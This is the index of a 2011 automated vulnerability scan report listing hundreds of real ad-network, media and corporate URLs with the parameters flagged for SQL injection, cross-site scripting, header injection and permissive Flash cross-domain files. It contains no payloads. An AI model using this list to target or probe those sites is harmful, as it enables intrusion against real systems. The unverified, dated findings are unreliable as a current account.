XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09172011-01
Report generated by XSS.CX at Sat Sep 17 12:36:31 CDT 2011.
1. SQL injection
1.1. http://a.abc.com/service/sfp/omnitureconfig/ [REST URL parameter 1]
1.2. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10 [id cookie]
1.3. http://ad.doubleclick.net/adj/tmz.toofab.wb.dart/ [name of an arbitrarily supplied request parameter]
1.4. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 1]
1.5. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 2]
1.6. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 3]
1.7. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 4]
1.8. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php [REST URL parameter 1]
1.9. http://cdn.media.abc.go.com/m/images/global/generic/logo.png [REST URL parameter 1]
1.10. http://googleads.g.doubleclick.net/pagead/ads [jsv parameter]
1.11. http://googleads.g.doubleclick.net/pagead/ads [slotname parameter]
1.12. http://googleads.g.doubleclick.net/pagead/ads [url parameter]
1.13. http://q1.checkm8.com/adam/detect [C cookie]
1.14. http://q1.checkm8.com/adam/detect [WIDTH_RANGE parameter]
1.15. http://q1.checkm8.com/adam/detect [cat parameter]
1.16. http://q1.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]
1.17. http://q1.checkm8.com/adam/report [C cookie]
1.18. http://q1.checkm8.com/adam/report [Referer HTTP header]
1.19. http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc [REST URL parameter 1]
1.20. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ktextColor parameter]
1.21. http://tag.contextweb.com/TagPublish/GetAd.aspx [Referer HTTP header]
1.22. http://tag.contextweb.com/TagPublish/GetAd.aspx [ca parameter]
1.23. http://tag.contextweb.com/TagPublish/GetAd.aspx [cwu parameter]
1.24. http://tag.contextweb.com/TagPublish/GetAd.aspx [cxy parameter]
1.25. http://tag.contextweb.com/TagPublish/GetAd.aspx [dw parameter]
1.26. http://tag.contextweb.com/TagPublish/GetAd.aspx [epid parameter]
1.27. http://tag.contextweb.com/TagPublish/GetAd.aspx [esid parameter]
1.28. http://tag.contextweb.com/TagPublish/GetAd.aspx [pb_rtb_ev cookie]
1.29. http://tag.contextweb.com/TagPublish/GetAd.aspx [pxy parameter]
1.30. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674 [REST URL parameter 3]
1.31. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 1]
1.32. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 2]
1.33. http://www.bradsdeals.com/dealsoftheday/subscribe/b [s parameter]
1.34. http://www.bradsdeals.com/dealsoftheday/subscribe/b [tid parameter]
1.35. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_campaign parameter]
1.36. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_content parameter]
1.37. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_medium parameter]
1.38. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_source parameter]
1.39. http://www.bradsdeals.com/res/opt/global.js [v parameter]
1.40. http://www.bradsdeals.com/res/opt/screen.css [v parameter]
2. Cross-site scripting (stored)
2.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]
2.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
2.3. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
2.4. http://livechat.iadvize.com/chat_init.js [vuid cookie]
3. HTTP header injection
3.1. http://2912a.v.fwmrm.net/ad/l/1 [cr parameter]
3.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
3.3. http://d7.zedo.com/utils/ecSet.js [v parameter]
3.4. http://usadmm.dotomi.com/dmm/servlet/dmm [rurl parameter]
4. Cross-site scripting (reflected)
4.1. http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js [REST URL parameter 5]
4.2. http://a.abc.com/service/sfp/omnitureconfig/ [pageURL parameter]
4.3. http://a.collective-media.net/adj/cm.rev_bostonherald/ [REST URL parameter 2]
4.4. http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]
4.5. http://a.collective-media.net/adj/cm.rev_bostonherald/ [sz parameter]
4.6. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]
4.7. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]
4.8. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]
4.9. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [sz parameter]
4.10. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 2]
4.11. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 3]
4.12. http://a.collective-media.net/adj/q1.bosherald/be_news [name of an arbitrarily supplied request parameter]
4.13. http://a.collective-media.net/adj/q1.bosherald/be_news [sz parameter]
4.14. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 2]
4.15. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 3]
4.16. http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]
4.17. http://a.collective-media.net/adj/q1.bosherald/ent_fr [sz parameter]
4.18. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 2]
4.19. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 3]
4.20. http://a.collective-media.net/adj/q1.bosherald/news [name of an arbitrarily supplied request parameter]
4.21. http://a.collective-media.net/adj/q1.bosherald/news [sz parameter]
4.22. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [REST URL parameter 2]
4.23. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [sz parameter]
4.24. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 1]
4.25. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]
4.26. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]
4.27. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [sz parameter]
4.28. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 1]
4.29. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 2]
4.30. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 3]
4.31. http://a.collective-media.net/cmadj/q1.bosherald/be_news [sz parameter]
4.32. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 1]
4.33. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 2]
4.34. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 3]
4.35. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [sz parameter]
4.36. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 1]
4.37. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 2]
4.38. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 3]
4.39. http://a.collective-media.net/cmadj/q1.bosherald/news [sz parameter]
4.40. http://ad.yieldmanager.com/imp [u parameter]
4.41. http://adnxs.revsci.net/imp [Z parameter]
4.42. http://adnxs.revsci.net/imp [s parameter]
4.43. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]
4.44. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]
4.45. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]
4.46. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
4.47. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
4.48. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]
4.49. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]
4.50. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]
4.51. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_creative_id parameter]
4.52. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_referral_url parameter]
4.53. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]
4.54. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]
4.55. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_border parameter]
4.56. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_link parameter]
4.57. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]
4.58. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]
4.59. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_title parameter]
4.60. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_league parameter]
4.61. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_team parameter]
4.62. http://api.bizographics.com/v2/profile.redirect [api_key parameter]
4.63. http://api.dimestore.com/viapi [id parameter]
4.64. http://ar.voicefive.com/b/rc.pli [func parameter]
4.65. http://b.scorecardresearch.com/beacon.js [c1 parameter]
4.66. http://b.scorecardresearch.com/beacon.js [c10 parameter]
4.67. http://b.scorecardresearch.com/beacon.js [c15 parameter]
4.68. http://b.scorecardresearch.com/beacon.js [c2 parameter]
4.69. http://b.scorecardresearch.com/beacon.js [c3 parameter]
4.70. http://b.scorecardresearch.com/beacon.js [c4 parameter]
4.71. http://b.scorecardresearch.com/beacon.js [c5 parameter]
4.72. http://b.scorecardresearch.com/beacon.js [c6 parameter]
4.73. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 2]
4.74. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 3]
4.75. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 4]
4.76. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 5]
4.77. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]
4.78. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]
4.79. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]
4.80. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]
4.81. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]
4.82. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]
4.83. http://blekko.com/autocomplete [query parameter]
4.84. http://bostonherald.com/includes/processAds.bg [companion parameter]
4.85. http://bostonherald.com/includes/processAds.bg [companion parameter]
4.86. http://bostonherald.com/includes/processAds.bg [page parameter]
4.87. http://bostonherald.com/includes/processAds.bg [page parameter]
4.88. http://bostonherald.com/includes/processAds.bg [position parameter]
4.89. http://bostonherald.com/includes/processAds.bg [position parameter]
4.90. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]
4.91. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]
4.92. http://bostonheraldnie.newspaperdirect.com/epaper/check.session [callback parameter]
4.93. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]
4.94. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]
4.95. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]
4.96. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]
4.97. http://choices.truste.com/ca [c parameter]
4.98. http://choices.truste.com/ca [cid parameter]
4.99. http://choices.truste.com/ca [iplc parameter]
4.100. http://choices.truste.com/ca [plc parameter]
4.101. http://choices.truste.com/ca [zi parameter]
4.102. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
4.103. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
4.104. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [q parameter]
4.105. http://event.adxpose.com/event.flow [uid parameter]
4.106. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 2]
4.107. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 3]
4.108. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 4]
4.109. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 5]
4.110. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 6]
4.111. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 7]
4.112. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [name of an arbitrarily supplied request parameter]
4.113. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [sz parameter]
4.114. http://g2.gumgum.com/services/get [callback parameter]
4.115. http://ib.adnxs.com/ptj [redir parameter]
4.116. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard [mbox parameter]
4.117. http://imp.fetchback.com/serve/fb/adtag.js [clicktracking parameter]
4.118. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
4.119. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]
4.120. http://jcp.org/en/jsr/all [name of an arbitrarily supplied request parameter]
4.121. http://js.revsci.net/gateway/gw.js [ali parameter]
4.122. http://js.revsci.net/gateway/gw.js [cid parameter]
4.123. http://js.revsci.net/gateway/gw.js [clen parameter]
4.124. http://js.revsci.net/gateway/gw.js [csid parameter]
4.125. http://js.revsci.net/gateway/gw.js [p parameter]
4.126. http://js.revsci.net/gateway/gw.js [pid parameter]
4.127. http://js.revsci.net/gateway/gw.js [pli parameter]
4.128. http://js.revsci.net/gateway/gw.js [ref parameter]
4.129. http://js.revsci.net/gateway/gw.js [sid parameter]
4.130. http://js.revsci.net/gateway/gw.js [ver parameter]
4.131. http://js.revsci.net/gateway/gw.js [vid parameter]
4.132. http://livechat.iadvize.com/rpc/referrer.php [get parameter]
4.133. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]
4.134. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]
4.135. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]
4.136. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]
4.137. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 4]
4.138. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 5]
4.139. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 6]
4.140. http://pglb.buzzfed.com/63857/8b52baa86e5b07ac085974feb13e2090 [callback parameter]
4.141. http://pglb.buzzfed.com/63857/bb0a99aabad3110617eff2ef79bb3c27 [callback parameter]
4.142. http://pglb.buzzfed.com/63857/d9dfb925d83ec9decb12af7e255ebee7 [callback parameter]
4.143. http://pixel.adsafeprotected.com/jspix [anId parameter]
4.144. http://pixel.adsafeprotected.com/jspix [campId parameter]
4.145. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
4.146. http://pixel.adsafeprotected.com/jspix [pubId parameter]
4.147. http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]
4.148. http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]
4.149. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]
4.150. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]
4.151. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 2]
4.152. http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]
4.153. http://router.infolinks.com/gsd/1316238723013.0 [callback parameter]
4.154. http://router.infolinks.com/gsd/1316238747946.0 [callback parameter]
4.155. http://router.infolinks.com/gsd/1316238789101.0 [callback parameter]
4.156. http://router.infolinks.com/gsd/1316238970770.0 [callback parameter]
4.157. http://router.infolinks.com/gsd/1316239040251.0 [callback parameter]
4.158. http://router.infolinks.com/gsd/1316239125269.0 [callback parameter]
4.159. http://router.infolinks.com/gsd/1316239185968.0 [callback parameter]
4.160. http://router.infolinks.com/gsd/1316239193603.0 [callback parameter]
4.161. http://rt1302.infolinks.com/action/doq.htm [rid parameter]
4.162. http://rt1302.infolinks.com/action/getads.htm [lid parameter]
4.163. http://rt1701.infolinks.com/action/doq.htm [rid parameter]
4.164. http://rt1702.infolinks.com/action/doq.htm [rid parameter]
4.165. http://rt1803.infolinks.com/action/doq.htm [rid parameter]
4.166. http://rt1804.infolinks.com/action/doq.htm [rid parameter]
4.167. http://rt1901.infolinks.com/action/doq.htm [rid parameter]
4.168. http://rt1903.infolinks.com/action/doq.htm [rid parameter]
4.169. http://s19.sitemeter.com/js/counter.asp [site parameter]
4.170. http://s19.sitemeter.com/js/counter.js [site parameter]
4.171. http://secure-us.imrworldwide.com/cgi-bin/m [REST URL parameter 2]
4.172. http://secure-us.imrworldwide.com/cgi-bin/m [at parameter]
4.173. http://secure-us.imrworldwide.com/cgi-bin/m [ci parameter]
4.174. http://secure-us.imrworldwide.com/cgi-bin/m [cr parameter]
4.175. http://secure-us.imrworldwide.com/cgi-bin/m [ep parameter]
4.176. http://secure-us.imrworldwide.com/cgi-bin/m [name of an arbitrarily supplied request parameter]
4.177. http://secure-us.imrworldwide.com/cgi-bin/m [r parameter]
4.178. http://secure-us.imrworldwide.com/cgi-bin/m [rt parameter]
4.179. http://secure-us.imrworldwide.com/cgi-bin/m [st parameter]
4.180. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]
4.181. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]
4.182. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]
4.183. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]
4.184. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]
4.185. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]
4.186. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]
4.187. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]
4.188. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]
4.189. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]
4.190. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]
4.191. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]
4.192. http://tps31.doubleverify.com/visit.js [plc parameter]
4.193. http://tps31.doubleverify.com/visit.js [sid parameter]
4.194. http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet [clickData parameter]
4.195. http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet [name of an arbitrarily supplied request parameter]
4.196. http://widgets.mobilelocalnews.com/ [uid parameter]
4.197. http://www-01.ibm.com/support/docview.wss [aid parameter]
4.198. http://www-01.ibm.com/support/docview.wss [name of an arbitrarily supplied request parameter]
4.199. http://www-146.ibm.com/nfluent/transwidget/tw.jsp [cd parameter]
4.200. http://www-146.ibm.com/nfluent/transwidget/tw.jsp [name of an arbitrarily supplied request parameter]
4.201. http://www.bostonherald.com/includes/processAds.bg [companion parameter]
4.202. http://www.bostonherald.com/includes/processAds.bg [companion parameter]
4.203. http://www.bostonherald.com/includes/processAds.bg [page parameter]
4.204. http://www.bostonherald.com/includes/processAds.bg [page parameter]
4.205. http://www.bostonherald.com/includes/processAds.bg [position parameter]
4.206. http://www.bostonherald.com/includes/processAds.bg [position parameter]
4.207. http://www.bradsdeals.com/dealsoftheday/subscribe/b [s parameter]
4.208. http://www.disenter.com/search.php [searchString parameter]
4.209. http://www.disenter.com/search.php [searchString parameter]
4.210. http://www.google.com/search [tch parameter]
4.211. http://www.jcp.org/en/home/index [REST URL parameter 3]
4.212. http://www.jcp.org/en/home/index [name of an arbitrarily supplied request parameter]
4.213. http://www.jcp.org/en/jsr/detail [id parameter]
4.214. http://www.jcp.org/en/jsr/detail [name of an arbitrarily supplied request parameter]
4.215. http://www.kaltura.com//api_v3/index.php [1%3Aaction parameter]
4.216. http://www.kaltura.com//api_v3/index.php [1%3AentryId parameter]
4.217. http://www.kaltura.com//api_v3/index.php [1%3Aservice parameter]
4.218. http://www.kaltura.com//api_v3/index.php [2%3Aaction parameter]
4.219. http://www.kaltura.com//api_v3/index.php [2%3AentryId parameter]
4.220. http://www.kaltura.com//api_v3/index.php [2%3Aservice parameter]
4.221. http://www.kaltura.com//api_v3/index.php [3%3Aaction parameter]
4.222. http://www.kaltura.com//api_v3/index.php [3%3AentryId parameter]
4.223. http://www.kaltura.com//api_v3/index.php [3%3Aservice parameter]
4.224. http://www.kaltura.com//api_v3/index.php [4%3Aaction parameter]
4.225. http://www.kaltura.com//api_v3/index.php [4%3Aservice parameter]
4.226. http://www.kaltura.com//api_v3/index.php [ks parameter]
4.227. http://www.kaltura.com//api_v3/index.php [name of an arbitrarily supplied request parameter]
4.228. http://www.kaltura.com//api_v3/index.php [service parameter]
4.229. http://www.open.com.au/cgi-bin/sf.cgi [config parameter]
4.230. https://www.open.com.au/cgi-bin/sf.cgi [config parameter]
4.231. https://www.open.com.au/onlineorder.php [name of an arbitrarily supplied request parameter]
4.232. http://www.vm.ibm.com/search/search.cgi [FILTER parameter]
4.233. http://www.vm.ibm.com/search/search.cgi [FILTER parameter]
4.234. http://www.vm.ibm.com/search/search.cgi [WORDS parameter]
4.235. http://www.vm.ibm.com/search/search.cgi [WORDS parameter]
4.236. http://www.westhost.com/images/bluegradbg.gif [REST URL parameter 1]
4.237. http://www.westhost.com/images/bluegradbg.gif [name of an arbitrarily supplied request parameter]
4.238. http://www.westhost.com/images/boxtopbackground.gif [REST URL parameter 1]
4.239. http://www.westhost.com/images/boxtopbackground.gif [name of an arbitrarily supplied request parameter]
4.240. http://adnxs.revsci.net/imp [Referer HTTP header]
4.241. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [Referer HTTP header]
4.242. http://livechat.iadvize.com/chat_init.js [Referer HTTP header]
4.243. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]
4.244. http://www.westhost.com/images/bluegradbg.gif [Referer HTTP header]
4.245. http://www.westhost.com/images/boxtopbackground.gif [Referer HTTP header]
4.246. http://3ps.go.com/DynamicAd [tqq cookie]
4.247. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
4.248. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]
4.249. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]
4.250. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]
4.251. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]
4.252. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [ZEDOIDA cookie]
4.253. http://livechat.iadvize.com/chat_init.js [vuid cookie]
4.254. http://s19.sitemeter.com/js/counter.asp [IP cookie]
4.255. http://s19.sitemeter.com/js/counter.js [IP cookie]
4.256. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp [wsa cookie]
5. Flash cross-domain policy
5.1. http://2912a.v.fwmrm.net/crossdomain.xml
5.2. http://3ps.go.com/crossdomain.xml
5.3. http://a.collective-media.net/crossdomain.xml
5.4. http://a.tribalfusion.com/crossdomain.xml
5.5. http://a1.interclick.com/crossdomain.xml
5.6. http://abc.csar.go.com/crossdomain.xml
5.7. http://action.media6degrees.com/crossdomain.xml
5.8. http://ad.afy11.net/crossdomain.xml
5.9. http://ad.auditude.com/crossdomain.xml
5.10. http://ad.turn.com/crossdomain.xml
5.11. http://adm.fwmrm.net/crossdomain.xml
5.12. http://admin.brightcove.com/crossdomain.xml
5.13. http://ads.yimg.com/crossdomain.xml
5.14. http://adserver.teracent.net/crossdomain.xml
5.15. http://adunit.cdn.auditude.com/crossdomain.xml
5.16. http://afe.specificclick.net/crossdomain.xml
5.17. http://alerts.4info.com/crossdomain.xml
5.18. http://amch.questionmarket.com/crossdomain.xml
5.19. http://analytics.newsinc.com/crossdomain.xml
5.20. http://aperture.displaymarketplace.com/crossdomain.xml
5.21. http://api.dimestore.com/crossdomain.xml
5.22. http://api.facebook.com/crossdomain.xml
5.23. http://ar.voicefive.com/crossdomain.xml
5.24. http://as.casalemedia.com/crossdomain.xml
5.25. http://as1.suitesmart.com/crossdomain.xml
5.26. http://assets.newsinc.com/crossdomain.xml
5.27. http://at.amgdgt.com/crossdomain.xml
5.28. http://b.voicefive.com/crossdomain.xml
5.29. http://b3.mookie1.com/crossdomain.xml
5.30. http://beta.abc.go.com/crossdomain.xml
5.31. http://bp.specificclick.net/crossdomain.xml
5.32. http://bs.serving-sys.com/crossdomain.xml
5.33. http://c.betrad.com/crossdomain.xml
5.34. http://c.brightcove.com/crossdomain.xml
5.35. http://cache.specificmedia.com/crossdomain.xml
5.36. http://cache2-scripts.pressdisplay.com/crossdomain.xml
5.37. http://cache2-styles.pressdisplay.com/crossdomain.xml
5.38. http://cdn.gigya.com/crossdomain.xml
5.39. http://cdn.kaltura.com/crossdomain.xml
5.40. http://cdn.turn.com/crossdomain.xml
5.41. http://cdnbakmi.kaltura.com/crossdomain.xml
5.42. http://clk.atdmt.com/crossdomain.xml
5.43. http://cplads.appspot.com/crossdomain.xml
5.44. http://d14.zedo.com/crossdomain.xml
5.45. http://d7.zedo.com/crossdomain.xml
5.46. http://dc.tremormedia.com/crossdomain.xml
5.47. http://dp.33across.com/crossdomain.xml
5.48. http://ds.serving-sys.com/crossdomain.xml
5.49. http://edge.aperture.displaymarketplace.com/crossdomain.xml
5.50. http://event.adxpose.com/crossdomain.xml
5.51. http://external.ak.fbcdn.net/crossdomain.xml
5.52. http://fw.adsafeprotected.com/crossdomain.xml
5.53. http://g-pixel.invitemedia.com/crossdomain.xml
5.54. http://g.ca.bid.invitemedia.com/crossdomain.xml
5.55. http://g2.gumgum.com/crossdomain.xml
5.56. http://goku.brightcove.com/crossdomain.xml
5.57. http://gscounters.gigya.com/crossdomain.xml
5.58. http://i.w55c.net/crossdomain.xml
5.59. http://ib.adnxs.com/crossdomain.xml
5.60. http://imagec12.247realmedia.com/crossdomain.xml
5.61. http://imp.fetchback.com/crossdomain.xml
5.62. http://js.revsci.net/crossdomain.xml
5.63. http://l.betrad.com/crossdomain.xml
5.64. http://l.yimg.com/crossdomain.xml
5.65. http://ll.static.abc.com/crossdomain.xml
5.66. http://llnwdo28.tmz.com/crossdomain.xml
5.67. http://load.exelator.com/crossdomain.xml
5.68. http://load.tubemogul.com/crossdomain.xml
5.69. http://loadm.exelator.com/crossdomain.xml
5.70. http://log.go.com/crossdomain.xml
5.71. http://map.media6degrees.com/crossdomain.xml
5.72. http://media.fastclick.net/crossdomain.xml
5.73. http://metrics.tmz.com/crossdomain.xml
5.74. http://network.realmedia.com/crossdomain.xml
5.75. http://oascentral.bostonherald.com/crossdomain.xml
5.76. http://objects.tremormedia.com/crossdomain.xml
5.77. http://odb.outbrain.com/crossdomain.xml
5.78. http://ping.crowdscience.com/crossdomain.xml
5.79. http://pix04.revsci.net/crossdomain.xml
5.80. http://pixel.33across.com/crossdomain.xml
5.81. http://pixel.adsafeprotected.com/crossdomain.xml
5.82. http://pixel.invitemedia.com/crossdomain.xml
5.83. http://ps2.newsinc.com/crossdomain.xml
5.84. http://puma.vizu.com/crossdomain.xml
5.85. http://q1.checkm8.com/crossdomain.xml
5.86. http://query.yahooapis.com/crossdomain.xml
5.87. http://r.casalemedia.com/crossdomain.xml
5.88. http://r.turn.com/crossdomain.xml
5.89. http://r1-ads.ace.advertising.com/crossdomain.xml
5.90. http://r1.zedo.com/crossdomain.xml
5.91. http://receive.inplay.tubemogul.com/crossdomain.xml
5.92. http://resources.infolinks.com/crossdomain.xml
5.93. http://rs.gwallet.com/crossdomain.xml
5.94. http://rt1302.infolinks.com/crossdomain.xml
5.95. http://rt1701.infolinks.com/crossdomain.xml
5.96. http://rt1702.infolinks.com/crossdomain.xml
5.97. http://rt1803.infolinks.com/crossdomain.xml
5.98. http://rt1804.infolinks.com/crossdomain.xml
